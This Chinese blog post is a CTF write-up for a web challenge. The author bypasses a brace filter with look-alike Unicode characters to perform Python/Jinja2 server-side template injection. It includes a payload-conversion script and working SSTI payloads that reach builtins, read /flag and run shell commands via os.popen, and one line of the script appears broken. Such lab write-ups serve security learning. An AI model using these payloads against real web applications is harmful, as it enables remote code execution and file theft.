热门标签
热门文章
- 120221905 2022-2023-2 《网络攻防实践》 第5周作业_网络实践攻防教程郭帆电子书
- 2PX4的位置估计似乎是有两种的_px4 位置估计公式
- 3C++中的继承
- 4基于STM32的智能加湿器设计_基于stm32开发的智能加湿器
- 5c++架构师必懂的五种设计模式_c++架构型模式
- 6本地读取不到远程仓库新分支_git本地仓库没有远程分支
- 7使用机器学习 最近邻算法(Nearest Neighbors)进行点云分析 (scikit-learn Open3D numpy)
- 8java.util.concurrent.ExecutionException异常的解决方案_org.elasticsearch.elasticsearchexception: java.uti
- 9智能体(Agent)大模型时代的AI革新者_大模型agent与智能体的比较
- 10[教程]Gitee保姆级图文使用教程
当前位置: article > 正文
CTF之easy_web_ctf easy!
作者:IT小白 | 2024-07-10 21:06:44
赞
踩
ctf easy!
打开网站就一个输入框,按理来说这种类型就是注入类型的漏洞了,至于什么注入还不知道
尝试了目录遍历以及漏洞扫描但是没有什么卵用,抓了一下包发现是python,所以考虑一下SSTI注入
但是好像{{}}被过滤了。
通过符号列表进行爆破,发现 / 也被过滤了,但是 ︷ 会被解析成 { ,︸ 会被解析成 }
然后就可以进行SSTI注入了
- """
- { -> ︷/﹛
- } -> ︸/﹜
- ' -> '
- , -> ,
- " -> "
- """
-
-
-
- #str = '''{{a.__init__.__globals__.__builtins__.eval("__import__('os').popen('ls').read()")}}''' # 原字符串
- str='{{().__class__.__bases__[0].__subclasses__()[91].__init__.__globals__.__builtins__['open'](\'/flag\').read()}}'
-
- #︷︷().__class__.__bases__[0].__subclasses__()[91].__init__.__globals__.__builtins__['open']('/flag').read()︸︸
-
-
- str = str.replace('{', '︷')
-
- str = str.replace('}', '︸')
-
- str = str.replace('\'',''' )
-
- str = str.replace('\"', '"')
-
-
-
- print(str)
下面是可以注入的ssti
- ︷︷().__class__.__mro__[1].__subclasses__()[91].__subclasses__()[91].__init__.__globals__.__builtins__['open']('/flag').read()︸︸
-
- ︷︷().__class__.__bases__[0].__subclasses__()[91].__init__.__globals__.__builtins__['open']('/flag').read()︸︸
-
- ︷︷().__class__.__bases__[0].__subclasses__()[91].__init__.__globals__.__builtins__['eval']("__import__('os').popen('cat /flag').read()")︸︸
得到flag{8f604f91-c36a-4413-bdaf-e786ffbfda61}
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/IT小白/article/detail/807703
推荐阅读
相关标签
